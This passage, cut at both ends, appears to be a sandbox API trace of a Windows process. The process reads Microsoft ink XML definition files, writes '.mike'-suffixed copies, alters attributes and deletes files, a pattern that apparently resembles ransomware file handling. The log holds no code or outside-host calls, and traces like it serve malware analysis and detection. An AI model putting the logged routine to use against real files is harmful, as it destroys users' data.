ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e)) returned 1 [0045.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.840] GetFileType (hFile=0x264) returned 0x1 [0045.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.840] GetFileType (hFile=0x264) returned 0x1 [0045.840] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.841] ReadFile (in: hFile=0x264, lpBuffer=0x21a6ee4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21a6ee4*, lpNumberOfBytesRead=0x2af038*=0xc5e, lpOverlapped=0x0) returned 1 [0045.842] CloseHandle (hObject=0x264) returned 1 [0045.842] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.843] GetFileType (hFile=0x264) returned 0x1 [0045.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.843] GetFileType (hFile=0x264) returned 0x1 [0045.843] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.843] WriteFile (in: hFile=0x264, lpBuffer=0x21ae7cc*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21ae7cc*, lpNumberOfBytesWritten=0x2af02c*=0xc60, lpOverlapped=0x0) returned 1 [0045.843] CloseHandle (hObject=0x264) returned 1 [0045.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.844] GetFileType (hFile=0x264) returned 0x1 [0045.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.844] GetFileType (hFile=0x264) returned 0x1 [0045.845] WriteFile (in: hFile=0x264, lpBuffer=0x21b1a0c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21b1a0c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.845] CloseHandle (hObject=0x264) returned 1 [0045.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.846] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58727c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58727c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58727c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.846] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21b321c | out: lpFileInformation=0x21b321c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58727c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58727c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58727c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", dwFileAttributes=0x80) returned 0 [0045.847] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.848] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe58727c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe58727c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe58727c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.848] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike")) returned 1 [0045.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.851] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.851] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.851] GetFileType (hFile=0x264) returned 0x1 [0045.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.851] GetFileType (hFile=0x264) returned 0x1 [0045.852] CloseHandle (hObject=0x264) returned 1 [0045.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.852] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.852] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.852] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b5468 | out: lpFileInformation=0x21b5468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2)) returned 1 [0045.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.852] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b57b4 | out: lpFileInformation=0x21b57b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2)) returned 1 [0045.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.852] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.853] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.854] GetFileType (hFile=0x264) returned 0x1 [0045.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.854] GetFileType (hFile=0x264) returned 0x1 [0045.854] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.854] WriteFile (in: hFile=0x264, lpBuffer=0x21b6768*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21b6768*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.855] CloseHandle (hObject=0x264) returned 1 [0045.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.855] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), fInfoLevelId=0x0, lpFileInformation=0x21b6228 | out: lpFileInformation=0x21b6228*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2)) returned 1 [0045.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpFilePart=0x0) returned 0x52 [0045.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.855] GetFileType (hFile=0x264) returned 0x1 [0045.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.855] GetFileType (hFile=0x264) returned 0x1 [0045.855] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.855] ReadFile (in: hFile=0x264, lpBuffer=0x21b78ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21b78ac*, lpNumberOfBytesRead=0x2af038*=0x2e2, lpOverlapped=0x0) returned 1 [0045.857] CloseHandle (hObject=0x264) returned 1 [0045.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.857] GetFileType (hFile=0x264) returned 0x1 [0045.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.857] GetFileType (hFile=0x264) returned 0x1 [0045.857] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.858] WriteFile (in: hFile=0x264, lpBuffer=0x21bb8f4*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21bb8f4*, lpNumberOfBytesWritten=0x2af02c*=0x2f0, lpOverlapped=0x0) returned 1 [0045.858] CloseHandle (hObject=0x264) returned 1 [0045.858] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike", lpFilePart=0x0) returned 0x57 [0045.858] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.859] GetFileType (hFile=0x264) returned 0x1 [0045.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.859] GetFileType (hFile=0x264) returned 0x1 [0045.860] WriteFile (in: hFile=0x264, lpBuffer=0x21beb34*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: 